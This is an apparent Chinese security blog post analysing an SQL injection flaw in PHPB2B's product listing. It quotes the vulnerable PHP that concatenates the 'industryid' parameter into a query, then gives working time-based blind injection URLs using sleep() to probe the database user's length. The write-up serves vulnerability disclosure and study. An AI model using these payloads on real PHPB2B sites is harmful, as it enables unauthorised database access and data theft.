PHPB2B某处sql注入#3

时间:2015-1-28    作者:admin    分类: 技术交流


PHPB2B某处sql注入



官网最新版本



libraries/core/controllers/product_controller.php



176-187行

code 区域
function lists()

        {

                global $pos, $viewhelper;

                $viewhelper->setPosition(L("product_center", 'tpl'), 'index.php?do=product');

                $viewhelper->setTitle(L("product_center", 'tpl'));

                setvar("module", "product");

                $this->product->initSearch();

                $result = $this->product->Search($pos, $this->displaypg);

                setvar("items", $result);

                $this->view->assign("total_count", $this->product->amount);

                render("product/list");

        }



这里调用了一个函数product->initsearch()

跟入



libraries/core/models/product_controller.php

code 区域
function initSearch()

        {

                uses("industry","area");

                $this->area = new Areas();

                $this->industry = new Industries();

                $this->condition[] = "Product.status=1 ";

                if (isset($_GET['industryid'])) {

                        if (strpos($_GET['industryid'], ",")!==false) {

                                $this->condition[]= "Product.industry_id IN (".trim($_GET['industryid']).")";

                        }else{

                                $industryid = intval($_GET['industryid']);

                                $sub_ids = $this->industry->getSubDatas($industryid);

                                $sub_ids = array_keys($sub_ids);

                                $sub_ids = array_filter($sub_ids);

                                $this->condition[]= "Product.industry_id IN (".implode(",", $sub_ids).")";

                        }

                }

                if (isset($_GET['areaid'])) {

                        if (strpos($_GET['areaid'], ",")!==false) {

                                $this->condition[]= "Product.area_id IN (".trim($_GET['areaid']).")";

                        }else{

                                $areaid = intval($_GET['areaid']);

                                $this->condition[]= "Product.area_id='".$areaid."'";

                        }

                }

                if (isset($_GET['type'])) {

                        if($_GET['type']=="commend"){

                                $this->condition[] = "Product.if_commend='1'";

                        }

                }

                if (!empty($_GET['typeid'])) {

                        $this->condition[] = "Product.sort_id='".$_GET['typeid']."'";

                }

                if(!empty($_GET['q'])) {

                        $searchkeywords = strip_tags($_GET['q']);

                        $this->condition[]= "Product.name like '%".$searchkeywords."%'";

                }

                if (isset($_GET['pubdate'])) {

                        switch ($_GET['pubdate']) {

                                case "l3":

                                        $this->condition[] = "Product.created>".($this->timestamp-3*86400);

                                        break;

                                case "l10":

                                        $this->condition[] = "Product.created>".($this->timestamp-10*86400);

                                        break;

                                case "l30":

                                        $this->condition[] = "Product.created>".($this->timestamp-30*86400);

                                        break;

                                default:

                                        break;

                        }

                }

                if (!empty($_GET['total_count'])) {

                        $this->amount = intval($_GET['total_count']);

                }else{

                        $this->amount = $this->findCount();

                }

                if (!empty($_GET['orderby'])) {

                        switch ($_GET['orderby']) {

                                case "dateline":

                                        $this->orderby = "created DESC";

                                        break;

                                default:

                                        break;

                        }

                }

        }



代码大同小异,只看一处

code 区域
if (isset($_GET['industryid'])) {

                        if (strpos($_GET['industryid'], ",")!==false) {

                                $this->condition[]= "Product.industry_id IN (".trim($_GET['industryid']).")";

                        }else{

                                $industryid = intval($_GET['industryid']);

                                $sub_ids = $this->industry->getSubDatas($industryid);

                                $sub_ids = array_keys($sub_ids);

                                $sub_ids = array_filter($sub_ids);

                                $this->condition[]= "Product.industry_id IN (".implode(",", $sub_ids).")";

                        }

                }



如果传入的industryid中存在逗号,就拼接后加入condition数组中,没有强制类型转换,也没有单引号保护。

然后接着看libraries/core/models/product_controller.php



$result = $this->product->Search($pos, $this->displaypg);



执行了搜索。



其中又是一大堆拼接,转化,但是都跟我们没关系。我们直接看最后执行的sql语句。



访问

code 区域
localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())=0),sleep(30),0)%23


1.png



于是可以注入啦

localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())>10),sleep(30),0)%23

成功延时

localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())>15),sleep(30),0)%23

不延时

localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())=14),sleep(30),0)%23

延时成功

确定user()长度为14位



不再演示了。剩下的嘿嘿。。

标签: 注入 PHPB2B